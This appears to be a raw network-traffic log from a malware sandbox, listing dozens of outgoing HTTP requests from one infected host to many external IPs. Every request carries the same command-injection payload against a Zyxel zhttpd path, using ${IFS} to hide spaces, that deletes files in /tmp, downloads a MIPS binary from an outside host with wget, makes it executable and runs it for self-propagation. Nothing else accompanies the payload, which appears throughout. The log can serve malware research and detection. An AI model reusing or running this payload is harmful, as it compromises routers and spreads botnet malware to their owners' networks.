                                                      Feb 2, 2024 06:35:54.659650087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4776192.168.2.1433920187.136.216.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659692049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4777192.168.2.1456142213.171.247.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659744024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4778192.168.2.1447310163.204.15.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659760952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4779192.168.2.1456828191.39.102.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659826040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4780192.168.2.1443688199.144.176.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659874916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4781192.168.2.1452016210.4.176.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659907103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4782192.168.2.1457174179.58.86.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659941912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4783192.168.2.1448154130.211.191.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660000086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4784192.168.2.1439880166.54.149.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660032034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4785192.168.2.1448392159.66.238.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660053015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4786192.168.2.143975097.191.15.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660120010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4787192.168.2.1453782115.140.194.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660124063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4788192.168.2.1453924133.14.175.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660176039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4789192.168.2.144987471.233.68.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660218000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4790192.168.2.145599475.95.5.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660269022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4791192.168.2.145032094.239.43.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660288095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4792192.168.2.1458460161.194.145.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660345078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4793192.168.2.145640637.118.123.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660366058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4794192.168.2.1450994173.155.132.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660408974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4795192.168.2.1450138165.81.173.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660455942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4796192.168.2.145653297.93.74.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660494089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4797192.168.2.144213237.233.15.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660533905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4798192.168.2.143375041.19.116.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660578012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4799192.168.2.1440350123.222.146.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660635948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4800192.168.2.1451588193.231.83.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660676003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4801192.168.2.1452204123.26.169.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660732031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4802192.168.2.1444576139.63.12.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660764933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4803192.168.2.143883074.84.8.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660795927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4804192.168.2.1452492152.177.213.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660831928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4805192.168.2.1449746219.187.113.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660877943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4806192.168.2.1437258136.147.4.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660914898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4807192.168.2.1446052119.7.79.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660939932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4808192.168.2.1453106152.252.25.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.660990953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4809192.168.2.1437622159.203.235.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661020041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4810192.168.2.1451706155.0.148.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661065102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4811192.168.2.144633823.178.231.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661096096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4812192.168.2.1433368183.97.221.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661134005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4813192.168.2.1446654173.239.1.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661197901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4814192.168.2.1433688137.30.155.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661216021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4815192.168.2.1434978198.53.101.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661267996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4816192.168.2.145056018.175.108.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661319971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4817192.168.2.1436996210.47.58.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661364079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4818192.168.2.143969497.131.196.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661407948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4819192.168.2.1452064209.161.194.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661441088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4820192.168.2.1449902169.37.171.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661464930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4821192.168.2.145788888.236.177.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661530018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4822192.168.2.1459958128.195.44.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661569118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4823192.168.2.1436568206.173.149.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661616087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4824192.168.2.1455128126.186.109.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661663055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4825192.168.2.1435404169.140.200.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661715984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4826192.168.2.1443262152.104.125.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661770105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4827192.168.2.1450472103.52.20.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661803007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4828192.168.2.143329827.249.71.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661853075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4829192.168.2.1436028187.64.228.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661896944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4830192.168.2.145093299.162.2.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661947966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4831192.168.2.1460828113.67.211.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.661999941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4832192.168.2.1435294102.16.17.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662045956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4833192.168.2.145659087.230.102.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662091970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4834192.168.2.1452124175.150.218.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662153006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4835192.168.2.1451400110.62.120.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662203074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4836192.168.2.1455900116.109.226.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662247896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4837192.168.2.1438918193.54.148.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662283897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4838192.168.2.1434044122.160.26.5443
                                                      TimestampBytes transferredDirectionData
